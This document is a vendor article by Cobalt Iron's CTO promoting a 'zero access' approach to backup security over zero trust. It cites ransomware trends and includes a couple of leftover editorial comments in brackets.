Astute data custodians use zero-trust methods to enhance infrastructure security. This model shifts the security perimeter from traditional network boundaries to individual resources, requiring continuous authentication and authorization for every single access request. However, a fundamental issue remains: the fact that access is granted in the first place. Once authenticated, a user could still do harm, even if by accident.
While zero trust significantly improves security, there is a more robust way to secure the backup environment, and that is not to grant access to it at all. The zero-access concept addresses the limitations of zero trust.
The Current Threat Landscape
Cybersecurity experts have seen a significant surge in cyber activities, primarily focused on obtaining credentials, gaining access, and manipulating or removing data. These activities often culminate in ransomware or other catastrophic attacks, forcing your business to recover and potentially even pay a ransom.
What’s more, the threat landscape has evolved to a point where many attackers are now using AI to make their attacks easier. For instance, AI-generated phishing emails can now mimic trusted figures like CEOs, making the attack more convincing and harder to detect.
Backup operations are particularly attractive targets for these threats. Sophos’ 2024 State of Ransomware report reveals that 94% of cyber attacks also attempt to compromise backup. Some ransomware gangs and variants like LockBit specifically target backup environments. A recent attack on UnitedHealthcare, a company that typically fends off an attack every 70 seconds, managed to freeze large portions of its IT infrastructure, including backup systems.
While the zero-trust approach is crucial in securing enterprise backup environments, it has limitations. On its own, zero trust is not enough to protect backup against these sophisticated threats.
Things Have Changed
In the past, once users passed initial security checks, they were trusted forever. They could access any resource in the network without ever being verified again. But the modern IT landscape — with its cloud computing, mobile workforces, and distributed systems — has rendered this approach obsolete. We can no longer rely on a single digital or physical barrier for protection. Because attackers can easily compromise user credentials and move laterally within the network, continuous verification is now a must.
Consequently, the access control methods that were effective a decade ago will no longer cut it.
The Concept of Zero Trust — Never Trust. Always Verify.
A zero-trust security model requires authentication for every single access request every time, no matter how many times the credentials have been verified before. The point of this “never trust; always verify” approach is to limit security exposure, minimize the number of attacks, and reduce the impact when they occur. That’s why zero trust belongs in every IT and data protection strategy.
Special Considerations for the Backup Environment
The backup environment poses unique security challenges that make it ideal for the zero access-approach.
For one thing, backup contains copies of data from all other applications, making it a prime target for cyber attacks.
The backup environment is also incredibly complex. Even small backup environments have numerous components, and in larger organizations and enterprises, the number of software and hardware components and the interactions between them is staggering. Each component typically requires access, creating multiple potential vulnerabilities, even in security-hardened operations that use zero-trust methods like multifactor authentication.
Unfortunately, no organization is immune, as we saw in a recent attack against a large company with well-secured IT operations managed by an experienced provider. Even though the company did all the right things, it still lost its backup catalog, rendering data unrecoverable. This example highlights the difficulty in securing backup, especially since many backup products weren’t designed to fend off cyber attacks.
Why Zero Trust Alone Can’t Secure Backup
Zero trust is crucial for improving cyber protection and is widely recommended for securing infrastructure and data. Everyone should use it wherever applicable. But backup and recovery environments need more security than zero trust can provide. That’s because zero trust has some limitations.
- Access is access: While zero trust makes access more difficult, the goal is still to grant access, which can be exploited if credentials are compromised. This is an unacceptable risk for backup systems.
- Multiple components = more vulnerability: The numerous components in a backup environment all act as potential attack vectors. Security is often managed separately for each component, thereby increasing the challenge.
- Inconsistent vendor adoption: Not all technology vendors fully embrace zero-trust principles in their product design and management. Even backup vendors that offer advanced security features typically can’t extend these protections to all components in a backup environment.
- Framework flaws: Legacy code and architectures could contain hidden vulnerabilities that zero-trust methods might not recognize. For example:
- SSH and OpenSSH, designed as secure replacements for remote login protocols, can serve as backdoor entries into some backup products.
- Log4j, commonly used for monitoring and logging events, has been the target of attacks like Log4Shell, which exploits openings in the software. Patching these vulnerabilities across all systems remains a challenge.
- Lack of cyber resilience for backup: Originally designed to counter hardware failures and human errors, backup now plays a crucial role in recovering from cyber attacks. To be truly cyber resilient, backup environments need advanced protection that is designed to withstand sophisticated attacks and maintain integrity when other systems are compromised. Zero-trust methods don’t do that.
Because of these weaknesses, it’s crucial to implement additional security measures tailored to the unique challenges of backup environments.
Enter the Zero-Access Model
Zero access is an advanced security approach for backup environments that surpasses traditional zero-trust methods. It prioritizes automation over access, significantly reducing the risk of human error and malicious intent in data breaches.
Key Features of Zero Access:
- Automation-centric design: Zero access emphasizes automation as the cornerstone of its security strategy. By eliminating unnecessary human interaction with backup components and operations, it enhances security while improving system efficiency and effectiveness.
- Comprehensive protection: This approach provides all-encompassing security for the entire backup infrastructure, safeguarding all components — including servers, software, databases, and storage systems — by removing access points for operational activities. In this way, zero access fills security gaps left by traditional zero-trust approaches.
- Elimination of manual management: Zero access revolutionizes backup management by removing traditional login capabilities, preventing account takeovers and unauthorized access. It replaces manual management with automated systems, ensuring consistent and secure operations. [Perhaps replace the 2nd sentence with – Elimination of various component log-ins eliminates most of the attack vectors that bad actors typically exploit. I would like to eliminate automation here as it sounds like we are duplicating #1]
Zero access incorporates a specialized management interface that gives administrators visibility and control over the backup environment without direct access to the infrastructure. It implements robust zero-trust mechanisms, including multifactor authentication, to ensure only authorized personnel can interact with the system.
If there’s ever a legitimate reason to delete a full backup, like when decommissioning a system, the zero-access approach would follow defensible data deletion protocols that require auditable, multifactor approval for any data removal, thereby preventing administrators from unilaterally deleting data. And in rare instances when an admin would need to access backup devices in a true emergency, it would require multiphase security approval from both company admins and the service provider. These stringent processes ensure that even in emergencies, security remains intact.
Zero Access in Action
In a ransomware attack on a global company, hackers used stolen credentials to compromise more than 1,000 systems. Because the company’s backup solution implemented the zero-access approach, its backups were completely protected. The company recovered without engaging with the hackers.
More attacks came weeks later and caused additional damage [maybe we add here “that was once again recovered with clean, untouched backups” or something to that effect]. The attackers threatened to target the company’s backups, but because zero-access architecture eliminates the typical vulnerabilities found in backup environments, the hackers gave up and went away. This incident demonstrates the superior protection zero access offers compared to traditional zero-trust approaches.
Zero access represents a paradigm shift in backup security, offering a robust solution against cyber threats by redesigning how we manage and protect backup environments. By prioritizing automation, comprehensive protection, and stringent access controls, zero access is a new standard for securing critical backup data in an increasingly hostile digital landscape.
About the Author
Robert Marett, Chief Technology Officer, Cobalt Iron. Robert can be reached online at https://www.linkedin.com/in/robmarett/ and at our company website www.cobaltiron.com
